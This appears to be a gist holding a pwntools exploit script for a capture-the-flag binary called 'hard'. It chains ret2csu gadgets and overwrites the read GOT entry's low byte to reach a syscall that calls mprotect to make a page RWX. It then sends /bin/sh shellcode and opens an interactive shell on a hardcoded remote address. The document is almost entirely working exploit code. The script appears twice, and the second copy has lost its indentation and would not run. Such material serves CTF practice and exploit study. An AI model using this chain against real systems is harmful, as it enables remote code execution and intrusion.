PaulCher/writeup_mprotect_hard.py Secret

## writeup_mprotect_hard.py
#!/usr/bin/env python


from pwn import *

context(os='linux', arch='amd64')

BINARY = './hard'


def call_func(func, rdi=0, rsi=0, rdx=0):
    ucall = 0x04005A0
    upop = 0x004005BA

    p = ''
    p += p64(upop)
    p += p64(0)
    p += p64(1)
    p += p64(func)
    p += p64(rdx)
    p += p64(rsi)
    p += p64(rdi)
    p += p64(ucall)
    p += 'A' * 56
    return p


def exploit():
    REMOTE = 1

    if REMOTE:
        r = remote('128.199.152.175', 10001)
    else:
        r = process(BINARY)

    elf = ELF(BINARY)

    shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

    read = 0x400400
    bin_sh = 0x601700
    overwrite_read = 0x60100f
    address_of_page = 0x601000
    page_size = 0x1000
    rwx = 7

    read_ow = ''
    read_ow += '\0' * 9 # padding
    read_ow += '\x7e' # syscall lsb

    shellcode = asm(shellcraft.amd64.sh())

    p = ''
    p += 'A' * 16 # padding
    p += 'B' * 8  # rbp
    p += call_func(elf.got['read'], 0, bin_sh, 0x40) # read(0, 0x601700, 0x20)
    p += call_func(elf.got['read'], 0, overwrite_read, 0xa) # read(0, 0x601018, 0xa) # returns 0xa at $rax
    p += call_func(elf.got['read'], address_of_page, page_size, rwx)  # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
    p += p64(bin_sh)

    r.send(p)
    sleep(1)

    r.send(shellcode)
    sleep(1)

    r.sendline(read_ow)
    r.interactive()


if __name__ == '__main__':
    exploit()
	#!/usr/bin/env python


	from pwn import *

	context(os='linux', arch='amd64')

	BINARY = './hard'


	def call_func(func, rdi=0, rsi=0, rdx=0):
	ucall = 0x04005A0
	upop = 0x004005BA

	p = ''
	p += p64(upop)
	p += p64(0)
	p += p64(1)
	p += p64(func)
	p += p64(rdx)
	p += p64(rsi)
	p += p64(rdi)
	p += p64(ucall)
	p += 'A' * 56
	return p


	def exploit():
	REMOTE = 1

	if REMOTE:
	r = remote('128.199.152.175', 10001)
	else:
	r = process(BINARY)

	elf = ELF(BINARY)

	shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

	read = 0x400400
	bin_sh = 0x601700
	overwrite_read = 0x60100f
	address_of_page = 0x601000
	page_size = 0x1000
	rwx = 7

	read_ow = ''
	read_ow += '\0' * 9 # padding
	read_ow += '\x7e' # syscall lsb

	shellcode = asm(shellcraft.amd64.sh())

	p = ''
	p += 'A' * 16 # padding
	p += 'B' * 8 # rbp
	p += call_func(elf.got['read'], 0, bin_sh, 0x40) # read(0, 0x601700, 0x20)
	p += call_func(elf.got['read'], 0, overwrite_read, 0xa) # read(0, 0x601018, 0xa) # returns 0xa at $rax
	p += call_func(elf.got['read'], address_of_page, page_size, rwx) # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
	p += p64(bin_sh)

	r.send(p)
	sleep(1)

	r.send(shellcode)
	sleep(1)

	r.sendline(read_ow)
	r.interactive()


	if __name__ == '__main__':
	exploit()